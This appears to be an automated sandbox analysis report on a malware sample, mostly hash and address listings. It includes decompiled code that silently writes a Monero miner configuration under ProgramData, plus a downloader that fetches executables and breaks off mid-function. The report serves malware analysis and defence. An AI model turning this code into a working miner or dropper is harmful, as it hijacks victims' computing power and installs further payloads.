                                                                                                                                          • Source File: 00000000.00000002.230295899.00000000073B0000.00000040.00000001.sdmp, Offset: 073B0000, based on PE: false
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: 2a35b649b7a88b41fa68183160e8b358c8981500faac45605d2c3760faae5218
                                                                                                                                          • Instruction ID: 565039f80b266c4027bc981aed85668688f07968d44902cc11ee10f448334205
                                                                                                                                          • Opcode Fuzzy Hash: 2a35b649b7a88b41fa68183160e8b358c8981500faac45605d2c3760faae5218
                                                                                                                                          • Instruction Fuzzy Hash: 1BB092B03140008FC384CB2CC1A886A7BE5AB4960431A8095E20ACB731DB21EC008B40
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          Function 073B2928, Relevance: .0, Instructions: 6COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.230295899.00000000073B0000.00000040.00000001.sdmp, Offset: 073B0000, based on PE: false
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: 37634e3bf495d8ac3220c3b07c1f8c5bdfc768e64c0ccb9649850de655a7ee9b
                                                                                                                                          • Instruction ID: 2222ee44aadb90aa40c4838681930d396ad1c320b2a1110be37da1c6cac5130d
                                                                                                                                          • Opcode Fuzzy Hash: 37634e3bf495d8ac3220c3b07c1f8c5bdfc768e64c0ccb9649850de655a7ee9b
                                                                                                                                          • Instruction Fuzzy Hash: F0C09270601248CFCB0ACF34C1588407B72FF4230639A40D8D0098BA22CB36DCC2CB00
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          Non-executed Functions

                                                                                                                                          Function 07298539, Relevance: 1.7, Strings: 1, Instructions: 446COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.230258842.0000000007290000.00000040.00000001.sdmp, Offset: 07290000, based on PE: false
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID: %
                                                                                                                                          • API String ID: 0-2567322570
                                                                                                                                          • Opcode ID: 7c38afded0834e747cedaf5c183c7105da27ff8655772e1cb10473e30d7d4948
                                                                                                                                          • Instruction ID: 5361813c108881f8bcd5b9487d7e1aafaa3f25796e5b654a1183a3a9368f4033
                                                                                                                                          • Opcode Fuzzy Hash: 7c38afded0834e747cedaf5c183c7105da27ff8655772e1cb10473e30d7d4948
                                                                                                                                          • Instruction Fuzzy Hash: 75029DB0A00209DFDF14EFB9C844AAEBBB2FF89304F18892DD5059B355DB35A906CB51
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          Function 07296060, Relevance: 1.0, Instructions: 996COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.230258842.0000000007290000.00000040.00000001.sdmp, Offset: 07290000, based on PE: false
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: 1bbccdc7578aa988dffa904fb3f86a32ef567ab192f70611f220111164c7aeda
                                                                                                                                          • Instruction ID: bcbfccad063ee541f0a9d5578a6ea24f9d7b18b4e4776af0825cc69ed321bc49
                                                                                                                                          • Opcode Fuzzy Hash: 1bbccdc7578aa988dffa904fb3f86a32ef567ab192f70611f220111164c7aeda
                                                                                                                                          • Instruction Fuzzy Hash: 17A203B0A10219DFCF25DF68C894AA9BBB2FF49304F1585A9E849AB351CB75DD81CF40
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          Function 0729274A, Relevance: .9, Instructions: 871COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.230258842.0000000007290000.00000040.00000001.sdmp, Offset: 07290000, based on PE: false
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: 55bdd20f3f8d3c702c0480ca6e5d4b1da099897c51b76dbe42f2854255db54db
                                                                                                                                          • Instruction ID: d853ab7d46cbf08466ebc558ef0c0e109035d7a5e3eff0062f0e4eb1dbf8b5da
                                                                                                                                          • Opcode Fuzzy Hash: 55bdd20f3f8d3c702c0480ca6e5d4b1da099897c51b76dbe42f2854255db54db
                                                                                                                                          • Instruction Fuzzy Hash: 218228B4A10215CFDB64DF28C894A69B7F2FF89310F1985A9D44A9B361DB30ED81CF52
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          Function 0729F381, Relevance: .5, Instructions: 482COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.230258842.0000000007290000.00000040.00000001.sdmp, Offset: 07290000, based on PE: false
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: fb0bf94396c18ddc715bf305518d5a80dab0d06024ee19f6eac6504f27a9f288
                                                                                                                                          • Instruction ID: 1b1bbcc70045a52f645550b98e29d83381f4057e65d2457fcc6c6bf156b28603
                                                                                                                                          • Opcode Fuzzy Hash: fb0bf94396c18ddc715bf305518d5a80dab0d06024ee19f6eac6504f27a9f288
                                                                                                                                          • Instruction Fuzzy Hash: 212215B0A10219DFCB58CF68D994B99BBB2BF49305F1880A9E809EB351CB35DD85CF51
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          Function 014DE538, Relevance: .3, Instructions: 315COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.217947173.00000000014D0000.00000040.00000001.sdmp, Offset: 014D0000, based on PE: false
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: b10ef241a5e1414310c36b2bd5197ed8032d034dd639e3593cbbad8ab6f1f9ef
                                                                                                                                          • Instruction ID: a7705b36db51b144fbd2470434b77d2b692ec40fbdd764345bdc94cc3e423883
                                                                                                                                          • Opcode Fuzzy Hash: b10ef241a5e1414310c36b2bd5197ed8032d034dd639e3593cbbad8ab6f1f9ef
                                                                                                                                          • Instruction Fuzzy Hash: B612AFF1811B468BE734CF65E8985893BA1F785328B91420CD2616EBF9D7B8117ECF84
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          Function 014DC0F4, Relevance: .3, Instructions: 265COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.217947173.00000000014D0000.00000040.00000001.sdmp, Offset: 014D0000, based on PE: false
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: 847fdeefbe44fea8a3d099182198f7bcb2bd76bcab824f37e7371caf91351877
                                                                                                                                          • Instruction ID: 1b47636b44bb106c282a3639b692eb89a29f587911b306321476112a976325ca
                                                                                                                                          • Opcode Fuzzy Hash: 847fdeefbe44fea8a3d099182198f7bcb2bd76bcab824f37e7371caf91351877
                                                                                                                                          • Instruction Fuzzy Hash: DAA16C32E0021ACFCF05DFB5C8949DEBBB2FF95304B15856AE905AB261EB31A915CF40
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          Function 014DE528, Relevance: .2, Instructions: 223COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.217947173.00000000014D0000.00000040.00000001.sdmp, Offset: 014D0000, based on PE: false
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: 90f819417a483e1f671007ab312efd08e89903f22d1b3f6f71171f4967154847
                                                                                                                                          • Instruction ID: 86ac09720b49fa3055b23b1b90bfe5b50d98989f33213177fab950f6def14072
                                                                                                                                          • Opcode Fuzzy Hash: 90f819417a483e1f671007ab312efd08e89903f22d1b3f6f71171f4967154847
                                                                                                                                          • Instruction Fuzzy Hash: C2C115B1811B468BD724DF65E8985897BB1FB85328F51420CD2616FBF8D7B810BACF84
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          Analysis Process: P7Oa6i5muL.exe PID: 2492 Parent PID: 4116 P7Oa6i5muL.exeCOMMON

                                                                                                                                          Executed Functions

                                                                                                                                          Function 00403CA0, Relevance: 151.0, APIs: 7, Strings: 79, Instructions: 511nativefileCOMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          C-Code - Quality: 78%
                                                                                                                                          			E00403CA0(char* __ecx, void* __edx, void* _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
				char _v12;
				intOrPtr _v16;
				char _v20;
				char _v24;
				long _v28;
				void* _v32;
				long _v36;
				long _v40;
				intOrPtr _v44;
				char* _v48;
				long _v52;
				void* _v56;
				long _v60;
				void* _v64;
				long _v68;
				long _v72;
				struct _SYSTEM_INFO _v108;
				char _v2156;
				char _v2676;
				void* _t129;
				char* _t132;
				signed int _t137;
				void* _t139;
				long _t150;
				char* _t282;
				char* _t284;
				void* _t321;
				void* _t323;
				void* _t334;
				void* _t336;

				_t334 = __edx;
				_t331 = __ecx;
				_t129 =  *0x5d2df0; // 0x3b8
				_t336 = _a4;
				if(_t336 == 0) {
					_t129 =  *0x5d2124; // 0x408
				}
				if(_t129 != 0 && _t129 != 0xffffffff) {
					NtClose(_t129);
				}
				E00401A00( &_v2676, "C:\ProgramData\LKBNMTFJgl");
				_t132 =  &_v2676;
				if(_t336 == 0) {
					_push(L"\\cfg");
				} else {
					_push(L"\\cfgi");
				}
				_push(_t132);
				E00401970();
				E00401BB0( &_v2156, 0, 0x800);
				_a4 = 0;
				_v56 = 0;
				asm("xorps xmm0, xmm0");
				_v36 = 0;
				asm("movups [ebp-0x30], xmm0");
				_v32 = 0;
				_v28 = 0;
				_v64 = 0;
				_v60 = 0;
				_v72 = 0;
				_v68 = 0;
				GetSystemInfo( &_v108); // executed
				if(_t336 != 0) {
					_t137 = _v108.dwNumberOfProcessors;
					if( *0x5d130c != 1) {
						goto L11;
					} else {
						if(_t137 >= 1) {
							goto L17;
						} else {
							_t139 = 1;
						}
					}
					goto L18;
				} else {
					if( *0x5d1308 != 2) {
						E004017E0( &_v12, "1");
					} else {
						_t137 = _v108.dwNumberOfProcessors;
						L11:
						asm("cdq");
						_t137 = _t137 - _t334 >> 1;
						if(_t137 >= 1) {
							L17:
							_t139 =  >  ? 0xff : _t137;
						} else {
							_t139 = 1;
						}
						L18:
						_t331 =  &_v12;
						E00401550(_t139,  &_v12);
					}
				}
				asm("xorps xmm0, xmm0");
				asm("movq [ebp-0x10], xmm0");
				_push(0);
				_push(0);
				_push( &_v20);
				_push( &_v2676);
				if( *0x5d10b8() != 1) {
					L29:
					return 0; // executed
				} else {
					_v56 = 0x18;
					_v48 =  &_v20;
					_v52 = 0;
					_v44 = 0x40;
					_v40 = 0;
					_v36 = 0;
					_t150 = NtCreateFile( &_a4, 0x120116,  &_v56,  &_v32,  &_v64, 0x80, 0, 0, 0x60, 0, 0); // executed
					if(_t150 != 0) {
						goto L29;
					} else {
						E004017E0( &_v2156, "{\r\n\t\"api\": {");
						E004016E0( &_v2156, "\r\n\t\t\"id\": null,");
						E004016E0( &_v2156, "\r\n\t\t\"worker-id\": null");
						E004016E0( &_v2156, "\r\n\t},");
						E004016E0( &_v2156, "\r\n\t\"http\": {");
						E004016E0( &_v2156, "\r\n\t\t\"enabled\": false");
						E004016E0( &_v2156, "\r\n\t},");
						E004016E0( &_v2156, "\r\n\t\"autosave\": false,");
						E004016E0( &_v2156, "\r\n\t\"version\": 1,");
						E004016E0( &_v2156, "\r\n\t\"background\": false,");
						E004016E0( &_v2156, "\r\n\t\"colors\": true,");
						E004016E0( &_v2156, "\r\n\t\"randomx\": {");
						E004016E0( &_v2156, "\r\n\t\t\"init\": 1,");
						E004016E0( &_v2156, "\r\n\t\t\"numa\": true");
						E004016E0( &_v2156, "\r\n\t},");
						E004016E0( &_v2156, "\r\n\t\"cpu\": {");
						E004016E0( &_v2156, "\r\n\t\t\"enabled\": true,");
						E004016E0( &_v2156, "\r\n\t\t\"huge-pages\": true,");
						E004016E0( &_v2156, "\r\n\t\t\"hw-aes\": null,");
						E004016E0( &_v2156, "\r\n\t\t\"priority\": null,");
						E004016E0( &_v2156, "\r\n\t\t\"memory-pool\": false,");
						E004016E0( &_v2156, "\r\n\t\t\"asm\": true,");
						E004016E0( &_v2156, "\r\n\t\t\"argon2-impl\": null,");
						E004016E0( &_v2156, "\r\n\t\t\"cpu-profile\": {");
						E004016E0( &_v2156, "\r\n\t\t\t\"threads\": ");
						E004016E0( &_v2156,  &_v12);
						E004016E0( &_v2156, "\r\n\t\t},");
						E004016E0( &_v2156, "\r\n\t\t\"cn-heavy/0\": \"cpu-profile\",");
						E004016E0( &_v2156, "\r\n\t\t\"cn-heavy/xhv\": \"cpu-profile\",");
						E004016E0( &_v2156, "\r\n\t\t\"cn-heavy/tube\": \"cpu-profile\",");
						E004016E0( &_v2156, "\r\n\t\t\"cn-lite/0\": \"cpu-profile\",");
						E004016E0( &_v2156, "\r\n\t\t\"cn-lite/1\": \"cpu-profile\",");
						E004016E0( &_v2156, "\r\n\t\t\"cn\": \"cpu-profile\",");
						E004016E0( &_v2156, "\r\n\t\t\"cn/r\": \"cpu-profile\",");
						E004016E0( &_v2156, "\r\n\t\t\"cn/fast\": \"cpu-profile\",");
						E004016E0( &_v2156, "\r\n\t\t\"cn-gpu\": \"cpu-profile\",");
						E004016E0( &_v2156, "\r\n\t\t\"cn/half\": \"cpu-profile\",");
						E004016E0( &_v2156, "\r\n\t\t\"cn/2\": \"cpu-profile\",");
						E004016E0( &_v2156, "\r\n\t\t\"argon2/chukwa\": \"cpu-profile\",");
						E004016E0( &_v2156, "\r\n\t\t\"argon2/wrkz\": \"cpu-profile\",");
						E004016E0( &_v2156, "\r\n\t\t\"rx\": \"cpu-profile\",");
						E004016E0( &_v2156, "\r\n\t\t\"rx/0\": \"cpu-profile\",");
						E004016E0( &_v2156, "\r\n\t\t\"rx/loki\": \"cpu-profile\",");
						E004016E0( &_v2156, "\r\n\t\t\"rx/wow\": \"cpu-profile\",");
						E004016E0( &_v2156, "\r\n\t\t\"rx/arq\": \"cpu-profile\"");
						E004016E0( &_v2156, "\r\n\t},");
						E004016E0( &_v2156, "\r\n\t\"donate-level\": ");
						E004016E0( &_v2156, "0");
						E004016E0( &_v2156, ",");
						E004016E0( &_v2156, "\r\n\t\"donate-over-proxy\": 0,");
						E004016E0( &_v2156, "\r\n\t\"log-file\": null,");
						E004016E0( &_v2156, "\r\n\t\"pools\": [");
						E004016E0( &_v2156, "\r\n\t\t{");
						E004016E0( &_v2156, "\r\n\t\t\t\"algo\": null,");
						E004016E0( &_v2156, "\r\n\t\t\t\"coin\": \"monero\",");
						E004016E0( &_v2156, "\r\n\t\t\t\"url\": \"");
						E004016E0( &_v2156, _a8);
						E004016E0( &_v2156, "\",");
						E004016E0( &_v2156, "\r\n\t\t\t\"user\": \"");
						E004016E0( &_v2156, _a12);
						E004016E0( &_v2156, "\",");
						E004016E0( &_v2156, "\r\n\t\t\t\"pass\": \"");
						E004016E0( &_v2156, _a16);
						E004016E0( &_v2156, "\",");
						E004016E0( &_v2156, "\r\n\t\t\t\"rig-id\": null,");
						_t282 =  &_v2156;
						if(_a20 == 0) {
							_push("\r\n\t\t\t\"nicehash\": false,");
						} else {
							_push("\r\n\t\t\t\"nicehash\": true,");
						}
						_push(_t282);
						E004016E0();
						_t284 =  &_v2156;
						if( *0x5d1c24 == 0) {
							_push("\r\n\t\t\t\"keepalive\": false,");
						} else {
							_push("\r\n\t\t\t\"keepalive\": true,");
						}
						E004016E0();
						E004016E0( &_v2156, "\r\n\t\t\t\"enabled\": true,");
						E004016E0( &_v2156, "\r\n\t\t\t\"tls\": false,");
						E004016E0( &_v2156, "\r\n\t\t\t\"tls-fingerprint\": null,");
						E004016E0( &_v2156, "\r\n\t\t\t\"daemon\": false,");
						E004016E0( &_v2156, "\r\n\t\t\t\"self-select\": null");
						E004016E0( &_v2156, "\r\n\t\t}");
						E004016E0( &_v2156, "\r\n\t],");
						E004016E0( &_v2156, "\r\n\t\"print-time\": 60,");
						E004016E0( &_v2156, "\r\n\t\"health-print-time\": 60,");
						E004016E0( &_v2156, "\r\n\t\"retries\": 5,");
						E004016E0( &_v2156, "\r\n\t\"retry-pause\": 5,");
						E004016E0( &_v2156, "\r\n\t\"syslog\": false,");
						E004016E0( &_v2156, "\r\n\t\"user-agent\": null,");
						E004016E0( &_v2156, "\r\n\t\"watch\": false");
						E004016E0( &_v2156, "\r\n}");
						_t321 = E004088D0(_t331,  &_v2156, E00401850( &_v2156) + 1,  &_v24);
						_t323 =  *0x5d10c0(_a4, 0, 0, 0,  &_v32, _t321, _v24,  &_v72, 0, _t284); // executed
						_push(_a4);
						if(_t323 == 0) {
							NtClose(); // executed
							_push(_v16);
							E00403720(_t334, _t336, _v20); // executed
							return 1;
						} else {
							NtClose();
							goto L29;
						}
					}
				}
			}

































                                                                                                                                          0x00403ca0
                                                                                                                                          0x00403ca0
                                                                                                                                          0x00403ca3
                                                                                                                                          0x00403caf
                                                                                                                                          0x00403cb4
                                                                                                                                          0x00403cb6
                                                                                                                                          0x00403cb6
                                                                                                                                          0x00403cbd
                                                                                                                                          0x00403cc5
                                                                                                                                          0x00403cc5
                                                                                                                                          0x00403cd7
                                                                                                                                          0x00403cdf
                                                                                                                                          0x00403ce7
                                                                                                                                          0x00403cf0
                                                                                                                                          0x00403ce9
                                                                                                                                          0x00403ce9
                                                                                                                                          0x00403ce9
                                                                                                                                          0x00403cf5
                                                                                                                                          0x00403cf6
                                                                                                                                          0x00403d0c
                                                                                                                                          0x00403d14
                                                                                                                                          0x00403d1e
                                                                                                                                          0x00403d25
                                                                                                                                          0x00403d28
                                                                                                                                          0x00403d2f
                                                                                                                                          0x00403d34
                                                                                                                                          0x00403d3b
                                                                                                                                          0x00403d42
                                                                                                                                          0x00403d49
                                                                                                                                          0x00403d50
                                                                                                                                          0x00403d57
                                                                                                                                          0x00403d5e
                                                                                                                                          0x00403d66
                                                                                                                                          0x00403d9c
                                                                                                                                          0x00403d9f
                                                                                                                                          0x00000000
                                                                                                                                          0x00403da1
                                                                                                                                          0x00403da4
                                                                                                                                          0x00000000
                                                                                                                                          0x00403da6
                                                                                                                                          0x00403da6
                                                                                                                                          0x00403da6
                                                                                                                                          0x00403da4
                                                                                                                                          0x00000000
                                                                                                                                          0x00403d68
                                                                                                                                          0x00403d6f
                                                                                                                                          0x00403d8e
                                                                                                                                          0x00403d71
                                                                                                                                          0x00403d71
                                                                                                                                          0x00403d74
                                                                                                                                          0x00403d74
                                                                                                                                          0x00403d77
                                                                                                                                          0x00403d7c
                                                                                                                                          0x00403dad
                                                                                                                                          0x00403db7
                                                                                                                                          0x00403d7e
                                                                                                                                          0x00403d7e
                                                                                                                                          0x00403d7e
                                                                                                                                          0x00403dba
                                                                                                                                          0x00403dba
                                                                                                                                          0x00403dbf
                                                                                                                                          0x00403dbf
                                                                                                                                          0x00403d6f
                                                                                                                                          0x00403dca
                                                                                                                                          0x00403dcd
                                                                                                                                          0x00403dd2
                                                                                                                                          0x00403dd4
                                                                                                                                          0x00403dd6
                                                                                                                                          0x00403ddd
                                                                                                                                          0x00403de6
                                                                                                                                          0x00404444
                                                                                                                                          0x0040444a
                                                                                                                                          0x00403dec
                                                                                                                                          0x00403dfe
                                                                                                                                          0x00403e05
                                                                                                                                          0x00403e0f
                                                                                                                                          0x00403e1a
                                                                                                                                          0x00403e2a
                                                                                                                                          0x00403e32
                                                                                                                                          0x00403e39
                                                                                                                                          0x00403e41
                                                                                                                                          0x00000000
                                                                                                                                          0x00403e47
                                                                                                                                          0x00403e53
                                                                                                                                          0x00403e64
                                                                                                                                          0x00403e75
                                                                                                                                          0x00403e86
                                                                                                                                          0x00403e97
                                                                                                                                          0x00403ea8
                                                                                                                                          0x00403eb9
                                                                                                                                          0x00403eca
                                                                                                                                          0x00403ede
                                                                                                                                          0x00403eef
                                                                                                                                          0x00403f00
                                                                                                                                          0x00403f11
                                                                                                                                          0x00403f22
                                                                                                                                          0x00403f33
                                                                                                                                          0x00403f44
                                                                                                                                          0x00403f55
                                                                                                                                          0x00403f69
                                                                                                                                          0x00403f7a
                                                                                                                                          0x00403f8b
                                                                                                                                          0x00403f9c
                                                                                                                                          0x00403fad
                                                                                                                                          0x00403fbe
                                                                                                                                          0x00403fcf
                                                                                                                                          0x00403fe0
                                                                                                                                          0x00403ff4
                                                                                                                                          0x00404004
                                                                                                                                          0x00404015
                                                                                                                                          0x00404026
                                                                                                                                          0x00404037
                                                                                                                                          0x00404048
                                                                                                                                          0x00404059
                                                                                                                                          0x0040406a
                                                                                                                                          0x0040407e
                                                                                                                                          0x0040408f
                                                                                                                                          0x004040a0
                                                                                                                                          0x004040b1
                                                                                                                                          0x004040c2
                                                                                                                                          0x004040d3
                                                                                                                                          0x004040e4
                                                                                                                                          0x004040f5
                                                                                                                                          0x00404109
                                                                                                                                          0x0040411a
                                                                                                                                          0x0040412b
                                                                                                                                          0x0040413c
                                                                                                                                          0x0040414d
                                                                                                                                          0x0040415e
                                                                                                                                          0x0040416f
                                                                                                                                          0x00404180
                                                                                                                                          0x00404194
                                                                                                                                          0x004041a5
                                                                                                                                          0x004041b6
                                                                                                                                          0x004041c7
                                                                                                                                          0x004041d8
                                                                                                                                          0x004041e9
                                                                                                                                          0x004041fa
                                                                                                                                          0x0040420b
                                                                                                                                          0x0040421d
                                                                                                                                          0x0040422e
                                                                                                                                          0x0040423f
                                                                                                                                          0x0040424e
                                                                                                                                          0x0040425f
                                                                                                                                          0x00404270
                                                                                                                                          0x0040427f
                                                                                                                                          0x00404290
                                                                                                                                          0x004042a4
                                                                                                                                          0x004042ac
                                                                                                                                          0x004042b6
                                                                                                                                          0x004042bf
                                                                                                                                          0x004042b8
                                                                                                                                          0x004042b8
                                                                                                                                          0x004042b8
                                                                                                                                          0x004042c4
                                                                                                                                          0x004042c5
                                                                                                                                          0x004042cd
                                                                                                                                          0x004042da
                                                                                                                                          0x004042e3
                                                                                                                                          0x004042dc
                                                                                                                                          0x004042dc
                                                                                                                                          0x004042dc
                                                                                                                                          0x004042e9
                                                                                                                                          0x004042fd
                                                                                                                                          0x0040430e
                                                                                                                                          0x0040431f
                                                                                                                                          0x00404330
                                                                                                                                          0x00404341
                                                                                                                                          0x00404352
                                                                                                                                          0x00404363
                                                                                                                                          0x00404374
                                                                                                                                          0x00404388
                                                                                                                                          0x00404399
                                                                                                                                          0x004043aa
                                                                                                                                          0x004043bb
                                                                                                                                          0x004043cc
                                                                                                                                          0x004043dd
                                                                                                                                          0x004043ee
                                                                                                                                          0x00404412
                                                                                                                                          0x00404431
                                                                                                                                          0x00404437
                                                                                                                                          0x0040443c
                                                                                                                                          0x0040444b
                                                                                                                                          0x00404451
                                                                                                                                          0x00404458
                                                                                                                                          0x00404469
                                                                                                                                          0x0040443e
                                                                                                                                          0x0040443e
                                                                                                                                          0x00000000
                                                                                                                                          0x0040443e
                                                                                                                                          0x0040443c
                                                                                                                                          0x00403e41

                                                                                                                                          APIs
                                                                                                                                          • NtClose.NTDLL(000003B8), ref: 00403CC5
                                                                                                                                          • GetSystemInfo.KERNELBASE(?,?,?,?,?,?,?,00000000), ref: 00403D5E
                                                                                                                                          • RtlDosPathNameToNtPathName_U.NTDLL(?,00000001,00000000,00000000), ref: 00403DDE
                                                                                                                                          • NtCreateFile.NTDLL(00000000,00120116,00000018,00000000,00000000,00000080,00000000,00000000,00000060,00000000,00000000), ref: 00403E39
                                                                                                                                          • NtWriteFile.NTDLL(00000000,00000000,00000000,00000000,00000000,00000000,00404821,00000000,00000000), ref: 00404431
                                                                                                                                          • NtClose.NTDLL(00000000), ref: 0040443E
                                                                                                                                          • NtClose.NTDLL(00000000), ref: 0040444B
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000005.00000002.461137004.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                          Yara matches
                                                                                                                                          Similarity
                                                                                                                                          • API ID: Close$FilePath$CreateInfoNameName_SystemWrite
                                                                                                                                          • String ID: "algo": null,$"coin": "monero",$"daemon": false,$"enabled": true,$"keepalive": false,$"keepalive": true,$"nicehash": false,$"nicehash": true,$"pass": "$"rig-id": null,$"self-select": null$"threads": $"tls": false,$"tls-fingerprint": null,$"url": "$"user": "$"argon2-impl": null,$"argon2/chukwa": "cpu-profile",$"argon2/wrkz": "cpu-profile",$"asm": true,$"cn": "cpu-profile",$"cn-gpu": "cpu-profile",$"cn-heavy/0": "cpu-profile",$"cn-heavy/tube": "cpu-profile",$"cn-heavy/xhv": "cpu-profile",$"cn-lite/0": "cpu-profile",$"cn-lite/1": "cpu-profile",$"cn/2": "cpu-profile",$"cn/fast": "cpu-profile",$"cn/half": "cpu-profile",$"cn/r": "cpu-profile",$"cpu-profile": {$"enabled": false$"enabled": true,$"huge-pages": true,$"hw-aes": null,$"id": null,$"init": 1,$"memory-pool": false,$"numa": true$"priority": null,$"rx": "cpu-profile",$"rx/0": "cpu-profile",$"rx/arq": "cpu-profile"$"rx/loki": "cpu-profile",$"rx/wow": "cpu-profile",$"worker-id": null${$}$},$"autosave": false,$"background": false,$"colors": true,$"cpu": {$"donate-level": $"donate-over-proxy": 0,$"health-print-time": 60,$"http": {$"log-file": null,$"pools": [$"print-time": 60,$"randomx": {$"retries": 5,$"retry-pause": 5,$"syslog": false,$"user-agent": null,$"version": 1,$"watch": false$],$},$},$},$},$}$@$C:\ProgramData\LKBNMTFJgl$\cfg$\cfgi${"api": {
                                                                                                                                          • API String ID: 3784785972-1821464420
                                                                                                                                          • Opcode ID: 2299174eb71a117bdd1055cccbc8d6c97a541872e55d8ae9f2dc8b03f3bcfe8c
                                                                                                                                          • Instruction ID: 0c6b8c97c8f286fc2f2609601cf0158cca0e688ef71c127dda3ca6300913d252
                                                                                                                                          • Opcode Fuzzy Hash: 2299174eb71a117bdd1055cccbc8d6c97a541872e55d8ae9f2dc8b03f3bcfe8c
                                                                                                                                          • Instruction Fuzzy Hash: DE020771E5021CA6CB50EEE18C86FCE73ECAB04744F554677B148B21D2DEBEDA848B58
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          Function 00404B00, Relevance: 54.5, APIs: 20, Strings: 11, Instructions: 266networkCOMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          C-Code - Quality: 95%
                                                                                                                                          			E00404B00(void* __ecx, void* __edx, void* __eflags, char* _a4) {
				void* _v8;
				void _v12;
				void* _v16;
				void* _v20;
				long _v24;
				long _v28;
				long _v32;
				char* _v36;
				char* _v40;
				char* _v44;
				char* _v48;
				char* _v52;
				intOrPtr _v56;
				intOrPtr _v64;
				char* _v68;
				short _v88;
				intOrPtr _v92;
				intOrPtr _v96;
				intOrPtr _v104;
				char _v108;
				void* _v112;
				long _t54;
				int _t55;
				void* _t61;
				void* _t62;
				void* _t66;
				void* _t71;
				int _t78;
				long _t87;
				char* _t91;
				long _t108;
				void* _t111;
				char* _t118;
				long _t119;
				char* _t123;
				void* _t126;
				void* _t128;
				void* _t134;
				void* _t136;
				void* _t137;
				void* _t138;
				void* _t139;
				void* _t140;

				E00401BB0( &_v108, 0, 0x38);
				_t118 = _a4;
				_v24 = 0;
				_t108 = 0;
				_v112 = 0x3c;
				_v92 = 0xffffffff;
				_v104 = 0xffffffff;
				_v64 = 0xffffffff;
				_v56 = 0xffffffff;
				_t54 = E00401850(_t118);
				_t136 = _t134 + 0x10;
				_t55 = InternetCrackUrlA(_t118, _t54, 0,  &_v112); // executed
				if(_t55 != 0) {
					_t123 = E004015E0(_v92 + 1);
					E00401BB0(_t123, 0, _v92 + 1);
					E00401640(_t123, _v96, _v92);
					_t137 = _t136 + 0x1c;
					_t61 = InternetOpenA("WinInetGet/0.1", 0, 0, 0, 0); // executed
					_v8 = _t61;
					if(_t61 != 0) {
						_t62 = InternetConnectA(_t61, _t123, _v88, 0, 0, 3, 0, 0); // executed
						_v20 = _t62;
						_push(_t123);
						if(_t62 != 0) {
							E00401510();
							E004018D0(_t118, "https://");
							_t138 = _t137 + 0xc;
							_v52 = "text/*";
							_v48 = "application/exe";
							_v44 = "application/zlib";
							_t125 =  !=  ? 0x84ecf300 : 0x846cf300;
							_v40 = "application/gzip";
							_v36 = "application/applefile";
							_v32 = 0;
							_t66 = HttpOpenRequestA(_v20, "GET", _v68, 0, 0,  &_v52,  !=  ? 0x84ecf300 : 0x846cf300, 0); // executed
							_t126 = _t66;
							_v16 = _t126;
							if(_t126 == 0) {
								L26:
								InternetCloseHandle(_v20);
								InternetCloseHandle(_v8);
								return 0;
							} else {
								_t71 = E004018D0(_t118, "https://");
								_t139 = _t138 + 8;
								if(_t71 == 0) {
									L10:
									if(HttpSendRequestA(_t126, 0, 0, 0, 0) == 0) {
										goto L25;
									} else {
